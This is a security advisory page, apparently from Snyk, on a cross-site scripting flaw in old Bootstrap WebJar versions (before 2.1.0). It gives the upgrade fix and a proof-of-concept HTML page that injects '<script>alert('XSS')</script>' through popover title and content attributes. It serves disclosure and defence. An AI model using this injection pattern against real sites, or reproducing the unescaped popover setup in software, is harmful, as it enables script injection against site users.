Cross-site Scripting (XSS) Affecting org.webjars:bootstrap package, versions (,2.1.0)
Threat Intelligence
Exploit Maturity
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGWEBJARS-479511
- published 10 Apr 2017
- disclosed 9 May 2012
- credit Peter Corsaro
How to fix?
Upgrade org.webjars:bootstrap to version 2.1.0 or higher.
Overview
org.webjars:bootstrap is a WebJar for Bootstrap.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS)
The html option for popovers/tooltips is unescaped when grabbed with jQuery's .attr() method. This may allow attackers to exploit this vulnearbility
PoC
<!DOCTYPE html>
<html lang="en">
<head>
<title>Bootstrap Example</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<link
href="https://stackpath.bootstrapcdn.com/twitter-bootstrap/2.0.4/css/bootstrap-combined.min.css"
rel="stylesheet"
integrity="sha384-G87n9a15LEsz+OvKCr10ldEbckfbCpr2gjYnZgCiKiwH0p/If1QkSURCTzubbt19"
crossorigin="anonymous"
/>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.0/jquery.min.js"></script>
<script
src="https://stackpath.bootstrapcdn.com/twitter-bootstrap/2.0.4/js/bootstrap.min.js"
integrity="sha384-2sVosMIQw67h8RBCTmE20BSl9j66nWwbH+2W/CKr8celILSNnEfJnJv2PKCdet3I"
crossorigin="anonymous"
></script>
</head>
<body>
<div class="container">
<h3>Popover Example</h3>
<a
href="#"
data-toggle="popover"
title="<script>alert('XSS')</script>"
data-content="<script>alert('XSS')</script>"
>Toggle popover</a
>
</div>
<script>
$(document).ready(function() {
$('[data-toggle="popover"]').popover();
});
</script>
</body>
</html>
Details
References
CVSS Scores
version 3.1